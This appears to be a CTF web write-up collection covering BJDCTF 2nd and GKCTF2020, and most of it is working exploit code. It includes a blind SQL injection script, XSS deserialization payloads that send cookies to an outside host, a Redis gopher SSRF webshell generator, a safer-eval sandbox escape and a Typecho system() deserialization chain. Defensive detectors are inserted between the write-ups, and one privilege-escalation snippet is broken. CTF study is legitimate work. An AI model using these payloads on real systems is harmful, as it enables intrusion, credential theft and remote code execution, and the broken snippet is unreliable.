BJDCTF 2nd: Web

[BJDCTF 2nd] 简单注入 (Simple Injection)

Open the challenge; a directory scan turns up robots.txt.

It points to hint.txt.


The intended solution to this one is honestly ingenious.

Testing the login form shows that single quotes are filtered, so another approach is needed.

The hint gives the query. Entering a trailing backslash `\` in the username escapes the quote that was meant to close it, so whatever is entered in the password field escapes into the SQL:

```sql
select * from users where username='admin\' and password='or 1#';
```

So what we actually need is the password itself, since the hint says the flag is only given for the correct password.

On to the script; there is a BUU-specific pitfall here.

```python
import requests
import time

url = "http://c6674d57-499f-4db5-9048-cd5f86efc1b0.node3.buuoj.cn/index.php"

# The trailing backslash in the username escapes the closing quote, so the
# password field lands directly inside the WHERE clause.
data = {"username": "admin\\", "password": ""}
result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    # Binary search over printable ASCII for character i of the password.
    while head < tail:
        mid = (head + tail) >> 1

        # payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
        # OhyOuFOuNdit
        payload = "or/**/1^(ascii(substr(password,%d,1))>%d)#" % (i, mid)
        time.sleep(0.5)
        data['password'] = payload
        r = requests.post(url, data=data)

        if "stronger" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)
```
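As an added defender-side example (not from the writeup), here is a small Python detector that looks for the two traits of this attack in login attempts: a username ending in an escaping backslash and a password carrying boolean-probe tokens, together with the burst of requests the bisection loop produces. The attempts are constructed sample data; `ATTEMPTS`, `classify` and `burst_clients` are hypothetical names.

```python
import re
from collections import defaultdict

# Constructed sample of login attempts as (seconds, client_ip, username, password).
# The middle three mimic the bypass above: a trailing backslash in the username
# escapes the closing quote, and the password field carries the boolean probe.
ATTEMPTS = [
    (0.0, "10.0.0.5", "alice", "hunter2"),
    (1.0, "10.0.0.7", "admin\\", "or/**/1^(ascii(substr(password,1,1))>79)#"),
    (1.5, "10.0.0.7", "admin\\", "or/**/1^(ascii(substr(password,1,1))>103)#"),
    (2.0, "10.0.0.7", "admin\\", "or/**/if(ascii(substr(username,1,1))>64,1,0)#"),
    (3.0, "10.0.0.9", "bob\\", "plain"),
]

# Tokens typical of the probe: inline comments used as whitespace, boolean
# operators, and the character-extraction functions, or a trailing '#' comment.
PROBE = re.compile(r"(?i)/\*.*?\*/|\bor\b|\bxor\b|\bif\s*\(|\bascii\s*\(|\bsubstr\s*\(|#\s*$")

def ends_with_unpaired_backslash(s):
    """True when s ends in an odd run of backslashes, i.e. the last one would
    escape whatever quote the server appends after it."""
    return (len(s) - len(s.rstrip("\\"))) % 2 == 1

def classify(username, password):
    """Reasons this attempt looks like the quote-escape plus blind-probe pattern."""
    reasons = []
    if ends_with_unpaired_backslash(username):
        reasons.append("username ends with an escaping backslash")
    hits = sorted({m.group(0).lower() for m in PROBE.finditer(password)})
    if hits:
        reasons.append("password carries SQL probe tokens: " + ", ".join(hits))
    return reasons

def burst_clients(attempts, window=5.0, threshold=3):
    """Clients with >= threshold suspicious attempts inside `window` seconds;
    the bisection script above sends roughly seven probes per character."""
    per_client = defaultdict(list)
    for t, ip, user, pw in attempts:
        if classify(user, pw):
            per_client[ip].append(t)
    flagged = set()
    for ip, times in per_client.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.add(ip)
                break
    return flagged
```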

[BJDCTF 2nd] xss之光 (Light of XSS)

Git source leak:

```php
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
```

The challenge says XSS; I had never seen it exploited this way.

Exploiting __toString

The __toString() method defines how a class responds when it is treated as a string, e.g. what `echo $obj;` should display. It must return a string.

Exception

Works on PHP 5 and PHP 7.

Under PHP 7 this can produce an XSS, because the class has a built-in __toString method.
Test code:

```php
<?php
$a = unserialize($_GET['yds']);
echo $a;
```

exp:

```php
<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>
// yields: O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
```

The target then runs `echo unserialize(...)` on that value, so in the URL we set:

```
/?yds=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D
```

and alert(1) pops.

From the source we only see an unserialize() with no classes of our own, i.e. deserialization with no POP chain, so the only option is to deserialize a PHP built-in class. Since the result is echoed, the best candidates are built-in classes with a __toString() method; the usual ones are Error and Exception. Error only works on PHP 7, Exception works on both PHP 5 and 7, and checking the challenge environment shows PHP 5.
Since this is an XSS challenge, a window.open() in the payload is enough to carry the flag out, so:

payload:

```php
<?php
$y1ng = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
// window.open is the JavaScript method for opening a new window
```

window.location.href='url' also works as a redirect:

```php
<?php
$a = new Exception("<script>window.location.href='http://8ff615f3-da70-4d1a-959f-f29d817ecd90.node3.buuoj.cn'+document.cookie</script>");
echo urlencode(serialize($a));
?>
```

Or alert(document.cookie) to pop the cookie directly, but that does not work here, probably because HttpOnly is set:

```php
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>
```
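Added example, not part of the writeup: a small PHP-serialization walker in Python that lists the classes an incoming `yds` value would instantiate, so a code reviewer or request filter can spot built-in __toString classes such as Exception before unserialize() ever runs. It follows the declared lengths, handles nested arrays and objects, and therefore also applies to the base64-decoded `__typecho_config` cookie in the EzTypecho section later on (decode the base64 first). The sample is the Exception payload from above; `TOSTRING_BUILTINS`, `object_classes` and `risky_classes` are hypothetical names.

```python
from urllib.parse import unquote_to_bytes

# Built-in PHP classes with a __toString(), so `echo unserialize($x)` runs their
# code. Exception is the one used above; Error only exists on PHP 7.
TOSTRING_BUILTINS = {b"Exception", b"Error", b"ErrorException"}

def _parse(data, pos, classes):
    """Walk one serialized value starting at pos, collecting object class names.
    Returns the offset just past the value. Lengths come from the format itself,
    so an "O:" inside string data is never mistaken for an object header."""
    t = data[pos:pos + 1]
    if t == b"N":                                   # N;
        return pos + 2
    if t in (b"i", b"b", b"d"):                     # i:42;  b:1;  d:1.5;
        return data.index(b";", pos) + 1
    colon = data.index(b":", pos + 2)
    n = int(data[pos + 2:colon])
    if t == b"s":                                   # s:<len>:"<bytes>";
        return colon + 2 + n + 2
    if t == b"a":                                   # a:<count>:{key;value;...}
        pos = colon + 2
        for _ in range(2 * n):
            pos = _parse(data, pos, classes)
        return pos + 1
    if t == b"O":                                   # O:<len>:"<class>":<count>:{...}
        classes.append(data[colon + 2:colon + 2 + n])
        pos = colon + 2 + n + 2
        end = data.index(b":", pos)
        count = int(data[pos:end])
        pos = end + 2
        for _ in range(2 * count):
            pos = _parse(data, pos, classes)
        return pos + 1
    raise ValueError("unsupported type %r at offset %d" % (t, pos))

def object_classes(serialized):
    """Class names of every object, nested ones included, in a serialize() string."""
    classes, pos = [], 0
    while pos < len(serialized):
        pos = _parse(serialized, pos, classes)
    return classes

def risky_classes(param):
    """Percent-decode a query value (keeping the %00 property markers as raw
    bytes) and return the built-in __toString classes it would instantiate."""
    return [c for c in object_classes(unquote_to_bytes(param)) if c in TOSTRING_BUILTINS]

# Sample input: the Exception payload shown above.
SAMPLE = "O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A18%3A%22%2Fusercode%2Ffile.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D"
```

The real fix is to never hand user input to unserialize(): use json_decode(), or at minimum pass `['allowed_classes' => false]` so no object is instantiated at all.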

What is HttpOnly?
If the HttpOnly attribute is set on a cookie, JavaScript cannot read it, which effectively stops an XSS from stealing cookie contents and improves cookie security. Even so, do not store important information in cookies.

Then just look at the cookie parameter in the GET request that arrives.

Ref: https://blog.csdn.net/qq_45521281/article/details/105812056

[BJDCTF 2nd] elementmaster

No idea what is going on.....

A guess-the-trick challenge by y1ng.

Script:

```python
import requests as req

# Element symbols for 1..119 (Uue is the placeholder name for element 119);
# each symbol is tried as <symbol>.php on the challenge host.
elements = ('H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
            'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
            'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
            'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
            'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
            'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr',
            'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue')
for symbol in elements:
    link = "http://element-master.bjdctf.y1ng.vip:12309/" + symbol + ".php"
    response = req.get(link)
    if response.status_code == 200:
        print(response.text, end='')
```

Running it yields a filename; visiting it gives the flag:

And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php

If it is unclear, see y1ng's blog: https://www.gem-love.com/ctf/2097.html#XSS

A guessing challenge, don't overthink it; I hear this one was given almost 10 hints.

[BJDCTF 2nd] Schrödinger

Guessing challenge.

On the page, set the cookie to empty and hit check.

[BJDCTF 2nd] duangShell

The hint says it is a .swp source leak.

The source is at /.index.php.swp.

Then `vim -r` recovers the source:

```php
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {
    die("where is P3rh4ps's girl friend ???");
} else {
    $girl = $_POST['girl_friend'];
    if (preg_match('/\>|\\\/', $girl)) {
        die('just girl');
    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {
        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";
    } else {
        //duangShell~~~~
        exec($girl);
    }
}
```

exec() differs from system(): exec() returns nothing to the page.

Ref: https://blog.csdn.net/solitudi/article/details/108876692

https://blog.csdn.net/qq_45521281/article/details/105351352

[BJDCTF 2nd] 文件探测 (File Probing)

Scanning and capturing traffic finds home.php and admin.php.

Look at home.php first.

It looks like file inclusion, but a suffix is appended automatically, so the only option is to read the source of system through a PHP stream wrapper (pseudo-protocol).

system.php source:

```php
<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){
    echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
    header("Refresh:0.1;url=index.php");
    die;
}

$str2 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;url invalid<br>~$ ';
$str3 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;damn hacker!<br>~$ ';
$str4 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;request method error<br>~$ ';

?>
<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];

    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}
?>
```

home.php source:

```php
<?php

setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);

if(isset($_GET['file'])){
    if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
        die("forbidden");
    }

    if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
        die("not now!");
    }

    if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
        die("You! are! not! my! admin!");
    }

    if(preg_match("/^home$/i", $_GET['file'])){
        die("禁止套娃");
    }

    else{
        if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
            $file = $_GET['file'].".php";
        }
        else{
            $file = $_GET['file'].".fxxkyou!";
        }
        echo "现在访问的是 ".$file . "<br>";
        require $file;
    }
} else {
    echo "<script>location.href='./home.php?file=system'</script>";
}
```

[GKCTF2020] 老八小超市儿 (Lao Ba's Little Supermarket)

Found the admin backend.

Upload a theme to get a shell (path /public/static/index/default/shell.php).

Work out the path from the downloaded archive and from the site's homepage.

After connecting with AntSword there is a fake flag.

There is also an auto.sh:

```sh
#!/bin/sh
while true; do (python /var/mail/makeflaghint.py &) && sleep 60; done
```

Checking the process list, it runs as root, and the file owner is root.

makeflaghint.py:

```python
import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")
f.write(str(gk1))
f.write(str(gk))
f.close()
```

Simply append:

```python
ff = io.open("/root/flag", "rb+")
f.write(str(ff.read()))
```

Wait 60 seconds, then read the flag from flag.hint.

Ref: https://blog.csdn.net/weixin_43553654/article/details/106949100

[GKCTF2020] EZ三剑客-EzWeb

Entering baidu.com at random shows that it fetches the data.

The page source gives a hint; visit it:


It gives an IP, which smells like SSRF...

Try reading with the file protocol.

file:/var/www/html/index.php returns the source:

```php
<?php
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
    $url = $_GET['url'];
    //echo $url."\n";
    if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
    {
        //var_dump($match);
        die('别这样');
    }
    curl($url);
}
if(isset($_GET['secret'])){
    system('ifconfig');
}
?>
```

The IP given earlier has not been used yet, so use the http protocol to sweep for live hosts.

Eventually host .11 in the last octet returns something and tells us to hit a port, so sweep again; it is 6379.

Port 6379 shows a hint; check what service runs on 6379.

A quick search shows 6379 is normally Redis.

Since the url input only blocks file:// and not gopher://, this immediately suggests the Redis SSRF getshell; see this article:

https://byqiyou.github.io/2019/07/15/%E6%B5%85%E6%9E%90Redis%E4%B8%ADSSRF%E7%9A%84%E5%88%A9%E7%94%A8/

exp

```python
from urllib.parse import quote

protocol = "gopher://"
ip = "10.0.113.11"  # host running redis
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "shell.php"
path = "/var/www/html"
passwd = ""
# spaces inside the shell are replaced by ${IFS} so the split(" ") in
# redis_format keeps the whole string as one argument; they are restored below
cmd = ["flushall",
       "set 1 {}".format(shell.replace(" ", "${IFS}")),
       "config set dir {}".format(path),
       "config set dbfilename {}".format(filename),
       "save"
       ]
if passwd:
    cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    # encode one command as a RESP array of bulk strings
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += quote(redis_format(x))
    print(payload)
```

Result:

```
gopher://10.0.113.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%247%0D%0Acmd.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A
```

The automated tool on GitHub also works: https://github.com/tarunkant/Gopherus

Submit the above as the url, then request http://10.0.113.11/shell.php to get the flag:

```
http://df77808e-b3d0-4e06-9d9e-d31398e49ae4.node3.buuoj.cn/index.php?url=http://10.0.113.11/shell.php&submit=提交
```
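Added example (not from the writeup or from Gopherus): a decoder that turns a gopher:// URL like the one above back into the RESP commands curl would deliver to Redis, and names the CONFIG SET dir/dbfilename plus SAVE sequence that makes it a file write. It assumes the gopher URL shown above as its sample input; `gopher_payload`, `parse_resp` and `assess` are hypothetical names.

```python
from urllib.parse import unquote_to_bytes

# The gopher URL produced above, reused here as the sample input.
SAMPLE = "gopher://10.0.113.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%247%0D%0Acmd.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A"

def gopher_payload(url):
    """Bytes a gopher:// URL makes the client send: everything after the host,
    minus the leading '/' and the one-character item-type selector ('_' here)."""
    scheme, rest = url.split("://", 1)
    if scheme.lower() != "gopher":
        raise ValueError("not a gopher URL")
    _host, path = rest.split("/", 1)
    return unquote_to_bytes(path[1:])

def parse_resp(data):
    """Split a stream of RESP arrays (*n, then n bulk strings $len) into commands,
    each a list of byte arguments. Stops at the first malformed element."""
    cmds, pos = [], 0
    while data[pos:pos + 1] == b"*":
        end = data.index(b"\r\n", pos)
        n, pos, args = int(data[pos + 1:end]), end + 2, []
        for _ in range(n):
            if data[pos:pos + 1] != b"$":
                return cmds
            end = data.index(b"\r\n", pos)
            ln, pos = int(data[pos + 1:end]), end + 2
            args.append(data[pos:pos + ln])
            pos += ln + 2                       # skip the bulk string and its CRLF
        cmds.append(args)
    return cmds

def assess(cmds):
    """Name the steps that turn a reachable Redis into an arbitrary file write:
    CONFIG SET dir/dbfilename followed by SAVE (and the FLUSHALL before them)."""
    findings, reconfigured = [], False
    for c in cmds:
        name = c[0].lower() if c else b""
        if name == b"flushall":
            findings.append("FLUSHALL: wipes every key")
        elif (name == b"config" and len(c) == 4 and c[1].lower() == b"set"
              and c[2].lower() in (b"dir", b"dbfilename")):
            findings.append("CONFIG SET %s %s" % (c[2].decode(), c[3].decode()))
            reconfigured = True
        elif name == b"save" and reconfigured:
            findings.append("SAVE: RDB dump written to the path just configured")
    return findings
```

Seen in proxy or egress logs, that command sequence is the thing to alert on; on the Redis side, protected-mode, requirepass and binding to localhost stop the same payload even where the SSRF itself remains.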

Command execution through the script works here, but uploading a one-line webshell did not, which cost me a lot of time; I still have not figured out why.

Ref: https://a16n.github.io/2020/11/01/GKCTF2020-EZ%E4%B8%89%E5%89%91%E5%AE%A2-EzWeb/

[GKCTF2020] EZ三剑客-EzNode

Source:

```javascript
const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 found a great library

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 the boss said this makes later optimisation easier
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 the boss told me to speed it up, so I just wrote it like this; whatever others wrote is not my problem
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 the boss's wife says she wants to see our source code and compute KPI by line count
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 added this endpoint so I can check the version myself
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});
```

The important part is this:

```javascript
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000; // initial value of delay
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) { // parse the GET delay parameter as an int
      delay = Math.max(delay, parseInt(req.query.delay)); // take the larger of the default and the value we passed
    }
    const t = setTimeout(() => next(), delay); // delayed call that hands over to the next handler

    setTimeout(() => { // another timer, but with a shorter delay than the default
      clearTimeout(t); // so by default this one fires first
      console.log('timeout');
      try { // and it ends the request outright
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});
```

On setTimeout():

https://www.jeffjade.com/2016/01/10/2016-01-10-javacript-setTimeout/

Clearly the first timer (the one that calls next) has to fire before the second one for any chance at the flag, otherwise the request is simply ended. All we need is a delay greater than 2147483647; passing 2147483648 bypasses it.

Check the version: "safer-eval": "1.3.6"

To get past the try/catch without an error we use the sandbox escape mentioned above; this version is vulnerable to sandbox escape.

Set the POST parameter e to:

```javascript
(function () {
    const process = clearImmediate.constructor("return process;")();
    return process.mainModule.require("child_process").execSync("cat /flag").toString()
})()
```

and pass the GET parameter delay at the same time.

[GKCTF2020] EZ三剑客-EzTypecho

The deserialization vulnerability in Typecho's install.php, plus bypassing the $_SESSION check.

Vulnerability analysis:

https://www.freebuf.com/vuls/155753.html

The serialized string to pass in:

```php
<?php

class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';

    private $_type;
    private $_items;

    public function __construct() {
        //$this->_type = $this::RSS2;

        $this->_type = $this::ATOM1;
        $this->_items[0] = array(
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}

class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct() {
        $this->_params['screenName'] = "cat /flag";
        $this->_filter[0] = 'system';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>
```

exp

```python
import requests

s = requests.Session()

files = {"file": "eki"}

cookies = {
    "PHPSESSID": "test",
    "__typecho_config": "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"
}

headers = {
    "Referer": "http://30205fa6-2384-4aca-bb0f-8b217b32b0e6.node3.buuoj.cn/install.php"
}

data = {
    "PHP_SESSION_UPLOAD_PROGRESS": "123456789"
}

req = s.post("http://30205fa6-2384-4aca-bb0f-8b217b32b0e6.node3.buuoj.cn/install.php?finish=1",
             files=files, cookies=cookies, headers=headers, data=data)

print(req.text)
```

An extra Referer header is needed here, because install.php checks it:

```php
if (!empty($_GET) || !empty($_POST)) {
    if (empty($_SERVER['HTTP_REFERER'])) {
        exit;
    }
    // ...
}
```

Copyright © 2021-2023 Wh1tecell